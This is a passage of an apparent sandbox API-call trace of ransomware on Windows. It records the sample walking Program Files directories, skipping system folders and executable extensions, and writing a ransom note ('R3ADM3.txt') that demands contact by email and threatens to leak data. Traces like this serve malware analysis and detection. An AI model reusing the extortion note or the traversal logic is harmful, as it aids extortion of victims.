lpSrch=".sys") returned 0x0 [0138.209] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0138.209] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0138.209] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5816e4d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5816e4d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5816e4d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0138.209] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0138.209] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6830 | out: hHeap=0xea0000) returned 1 [0138.209] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0138.209] Sleep (dwMilliseconds=0x32) [0138.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0138.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3028 | out: hHeap=0xea0000) returned 1 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0138.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6830 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0138.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeebe78 [0138.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0138.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0138.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6830 | out: hHeap=0xea0000) returned 1 [0138.263] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\adobe\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0138.264] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0138.264] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0138.265] CloseHandle (hObject=0x210) returned 1 [0138.266] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0138.266] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0138.266] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x58206a50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58206a50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0138.266] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0138.266] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x58206a50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58206a50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.266] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0138.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0138.266] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7c14560, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xe89fff60, ftLastAccessTime.dwHighDateTime=0x1d58272, ftLastWriteTime.dwLowDateTime=0xe89fff60, ftLastWriteTime.dwHighDateTime=0x1d58272, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="alftp.exe", cAlternateFileName="")) returned 1 [0138.266] lstrcmpW (lpString1="alftp.exe", lpString2=".") returned 1 [0138.266] lstrcmpW (lpString1="alftp.exe", lpString2="..") returned 1 [0138.266] StrStrIW (lpFirst="alftp.exe", lpSrch=".UAKXC") returned 0x0 [0138.266] StrStrIW (lpFirst="alftp.exe", lpSrch=".exe") returned=".exe" [0138.266] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe735dd0, ftCreationTime.dwHighDateTime=0x1d5bba4, ftLastAccessTime.dwLowDateTime=0xfa940dd0, ftLastAccessTime.dwHighDateTime=0x1d55af2, ftLastWriteTime.dwLowDateTime=0xfa940dd0, ftLastWriteTime.dwHighDateTime=0x1d55af2, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="filezilla.exe", cAlternateFileName="FILEZI~1.EXE")) returned 1 [0138.266] lstrcmpW (lpString1="filezilla.exe", lpString2=".") returned 1 [0138.266] lstrcmpW (lpString1="filezilla.exe", lpString2="..") returned 1 [0138.266] StrStrIW (lpFirst="filezilla.exe", lpSrch=".UAKXC") returned 0x0 [0138.266] StrStrIW (lpFirst="filezilla.exe", lpSrch=".exe") returned=".exe" [0138.266] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58206a50, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58206a50, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58206a50, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0138.266] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0138.266] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0138.267] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0138.267] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 1 [0138.267] lstrcmpW (lpString1="Reader 10.0", lpString2=".") returned 1 [0138.267] lstrcmpW (lpString1="Reader 10.0", lpString2="..") returned 1 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="tmp") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="winnt") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="temp") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="thumb") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="$Recycle.Bin") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="$RECYCLE.BIN") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="System Volume Information") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="Boot") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="Windows") returned 0x0 [0138.267] StrStrIW (lpFirst="Reader 10.0", lpSrch="Trend Micro") returned 0x0 [0138.267] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6830 [0138.267] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0138.267] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0138.267] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0138.267] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0138.268] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0138.268] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6830 | out: hHeap=0xea0000) returned 1 [0138.268] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6830 [0138.268] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0138.268] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe78 | out: hHeap=0xea0000) returned 1 [0138.268] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader 10.0", cAlternateFileName="READER~1.0")) returned 0 [0138.268] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0138.268] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b00 | out: hHeap=0xea0000) returned 1 [0138.268] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0138.268] Sleep (dwMilliseconds=0x32) [0139.192] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.192] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3028 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0139.192] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0139.192] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.192] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0139.192] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.192] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b00 | out: hHeap=0xea0000) returned 1 [0139.192] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.193] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.193] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.194] CloseHandle (hObject=0x210) returned 1 [0139.194] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.194] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.195] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5829efd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5829efd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.195] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5829efd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5829efd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.195] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.195] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0139.195] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0139.195] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="tmp") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="winnt") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="temp") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="thumb") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="$Recycle.Bin") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="System Volume Information") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="Boot") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="Windows") returned 0x0 [0139.195] StrStrIW (lpFirst="Adobe", lpSrch="Trend Micro") returned 0x0 [0139.195] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.195] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.195] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.195] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.195] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.195] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0139.196] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe78 [0139.196] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.196] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x801d42c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x801d42c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0139.196] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0139.196] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0139.196] StrStrIW (lpFirst="Java", lpSrch="tmp") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="winnt") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="temp") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="thumb") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="$Recycle.Bin") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="System Volume Information") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="Boot") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="Windows") returned 0x0 [0139.196] StrStrIW (lpFirst="Java", lpSrch="Trend Micro") returned 0x0 [0139.196] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.196] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.196] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.196] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.196] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.196] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6808 [0139.196] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebf48 [0139.196] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.196] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0139.196] lstrcmpW (lpString1="microsoft shared", lpString2=".") returned 1 [0139.196] lstrcmpW (lpString1="microsoft shared", lpString2="..") returned 1 [0139.196] StrStrIW (lpFirst="microsoft shared", lpSrch="tmp") returned 0x0 [0139.196] StrStrIW (lpFirst="microsoft shared", lpSrch="winnt") returned 0x0 [0139.196] StrStrIW (lpFirst="microsoft shared", lpSrch="temp") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="thumb") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="$Recycle.Bin") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="System Volume Information") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="Boot") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="Windows") returned 0x0 [0139.197] StrStrIW (lpFirst="microsoft shared", lpSrch="Trend Micro") returned 0x0 [0139.197] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0139.197] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.197] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.197] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.197] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.197] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.197] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0139.197] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6768 [0139.197] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee4a0 [0139.197] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.197] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5829efd0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5829efd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5829efd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.197] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.197] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.197] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.198] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0139.198] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0139.198] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0139.198] StrStrIW (lpFirst="Services", lpSrch="tmp") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="winnt") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="temp") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="thumb") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="$Recycle.Bin") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="System Volume Information") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="Boot") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="Windows") returned 0x0 [0139.198] StrStrIW (lpFirst="Services", lpSrch="Trend Micro") returned 0x0 [0139.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece00 [0139.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.198] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.198] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.198] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeece00 | out: hHeap=0xea0000) returned 1 [0139.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece00 [0139.198] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebfb0 [0139.198] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.198] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, 